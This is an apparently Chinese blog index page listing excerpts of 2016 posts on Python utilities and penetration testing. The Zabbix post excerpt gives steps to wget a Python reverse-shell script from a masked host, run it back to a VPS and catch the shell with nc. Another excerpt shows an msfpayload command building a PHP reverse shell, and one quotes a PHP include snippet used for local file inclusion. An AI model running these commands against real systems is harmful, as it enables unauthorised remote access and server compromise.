上一页 1 ··· 8 9 10 11 12 13 下一页

2016年4月14日

python扫描内网banner信息

摘要: 小菜自己无聊写着玩,主要纪念以前的逗逼学习,可以改IPy 阅读全文

posted @ 2016-04-14 14:13 lly001 阅读(216) 评论(0) 推荐(0) 编辑

一次zabbix的渗透

摘要: wget http://xxxxxxx:8888/back.py -O /tmp/1.py 写入python反弹马 反弹到vps python /tmp/back.py IP port 执行python反弹马 仪表盘执行命令 vps上监听nc -l -vv -p8080得交互shell 之后慢慢玩 阅读全文

posted @ 2016-04-14 14:11 lly001 阅读(413) 评论(0) 推荐(0) 编辑

Tips

摘要: 1、Md5加密 & Base64编解码#! /usr/bin/env python# -*- coding: utf-8 -*- import md5from base64 import b64encode,b64decodeprint(md5.md5('123456').hexdigest())p 阅读全文

posted @ 2016-04-14 14:10 lly001 阅读(158) 评论(0) 推荐(0) 编辑

IPy

摘要: IPy生成网段列表from IPy import IPip = IP('192.168.0.0/16')print ip.len()for x in ip:print (x) ip的属性,'PUBLIC','PRIVATE'ip = IPy.IP('12.3.1.3')ip.iptype() 通过s 阅读全文

posted @ 2016-04-14 14:09 lly001 阅读(368) 评论(0) 推荐(0) 编辑

文件读取漏洞路径收集

摘要: 1.LINUX常见路径: 2..windows常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘) 3.网站相对路径: 阅读全文

posted @ 2016-04-14 14:08 lly001 阅读(326) 评论(0) 推荐(0) 编辑

argparse

摘要: import argparse def test(a,b): print int(a)+int(b) parser = argparse.ArgumentParser() parser.add_argument("-x","--x",dest="a",default=1, type=int, help='the first argument') parser.ad... 阅读全文

posted @ 2016-04-14 14:07 lly001 阅读(112) 评论(0) 推荐(0) 编辑

代码审计之配置

摘要: register_globals:php<5.4.0 PHP_INI_ALL:可在任何地方设置<?phpif($user == 'admin'){echo 'true';}?> allow_url_include:在5.2.0及以后默认off PHP_INI_ALL:可在任何地方设置(allow_u 阅读全文

posted @ 2016-04-14 14:06 lly001 阅读(132) 评论(0) 推荐(0) 编辑

ctf之加密

摘要: from:http://drops.wooyun.org/tips/10002 0x01 Base64 Base64:ZXZhbCgkX1BPU1RbcDRuOV96MV96aDNuOV9qMXVfU2gxX0oxM10pNTU2NJC3ODHHYWJIZ3P4ZWY= Base64编码要求把3个8 阅读全文

posted @ 2016-04-14 14:05 lly001 阅读(599) 评论(0) 推荐(0) 编辑

内网渗透中的反弹Shell与端口转发

摘要: from:https://www.91ri.org/9367.html Web渗透中的反弹Shell与端口转发 php需未禁用exec函数一:生成php反弹脚本msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php 将 阅读全文

posted @ 2016-04-14 14:04 lly001 阅读(1265) 评论(0) 推荐(0) 编辑

利用zip(或者phar)协议进行本地文件包含

摘要: $include_file=$_GET[include_file];if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" ){require( $include_file );} 1.ph 阅读全文

posted @ 2016-04-14 14:03 lly001 阅读(445) 评论(0) 推荐(0) 编辑

上一页 1 ··· 8 9 10 11 12 13 下一页

导航